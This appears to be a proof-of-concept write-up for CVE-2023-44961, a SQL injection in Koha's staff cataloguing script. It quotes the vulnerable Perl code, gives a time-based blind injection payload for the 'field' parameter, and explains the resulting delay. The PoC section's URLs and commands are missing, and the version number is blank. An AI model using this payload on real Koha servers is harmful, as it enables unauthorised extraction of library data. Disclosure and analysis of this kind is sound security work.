# CVE-2023-44961
PoC for CVE-2023-44961

# Description
This is a SQL injection vulnerability in Koha Library Software v. and before, which allows a remote attacker to obtain arbitrary data from the Koha SQL server.

# Analysis

This vulnerability is in the `intranet/cgi bin/cataloging/` script of the `intranet` (staff) interface:

```perl
use Modern::Perl;
use CGI qw ( -utf8 );
use C4::Context;

my $input = CGI->new;

# All three values come straight from the request
my $query = $input->param('term');
my $table = $input->param('table');
my $field = $input->param('field');

# Prevent from disclosing data: only $table is checked, $field is not
die() unless ($table eq "biblioitems"); 

my $dbh = C4::Context->dbh;
# $field is interpolated unquoted and unvalidated into every clause
my $sql = qq(SELECT distinct $field
             FROM $table 
             WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?);
$sql .= qq( ORDER BY $field);
my $sth = $dbh->prepare($sql);
# Only $query goes through bound placeholders, so it is not injectable
$sth->execute("$query%", "% $query%", "%-$query%");
```

When the `$sql` string is built, `$field` is interpolated directly into the statement with no validation, quoting or keyword filtering; the only check is that `$table` equals `biblioitems`. Because `$field` is never bound as a placeholder, restricting it to a fixed allow-list of column names is the proper fix; until then we can achieve time-based blind SQL injection by supplying the following payload as the `field` parameter:

```
$field = 1 and if((substr(database(),1,1)='k'), sleep(1), sleep(0))
```

The SQL statement after concatenation is (the three `?` placeholders are bound to the `LIKE` patterns derived from `$query` and play no part in the injection):

```sql
SELECT distinct 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0))
FROM biblioitems
WHERE 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE ?
   OR 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE ?
   or 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE ?
ORDER BY 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0))
```

Since `SELECT distinct $field FROM $table WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?` returns every value of `$field` in `$table` that satisfies one of the three `LIKE` conditions, the `WHERE` clause is evaluated for every row of `$table`, and each of its three predicates evaluates the injected `IF(..., sleep(1), sleep(0))` once. With n rows the total delay is therefore roughly 3n times the sleep argument, not the sleep argument itself (for a single row, `sleep(1)` costs about 3 seconds).

Therefore, to keep the total delay down, set the per-evaluation sleep to `1/n` (n represents the number of rows in `$table`), that is, `sleep(1/n)`.

## PoC

To trigger the SQL injection vulnerability, first make sure there is at least one row in the `biblioitems` table (an empty table evaluates no `WHERE` predicates and so produces no delay). We can add data through the following URL:


I have added a piece of data here:


Test our SQL statements on the command line:


It can be seen that with one row in the `biblioitems` table and the sleep set to 1 second, the actual delay is 3 seconds.

Following this approach, a PoC can be constructed for testing:

Access the following URL to trigger it:



As shown in the figure, my database name is `koha_mykoha`.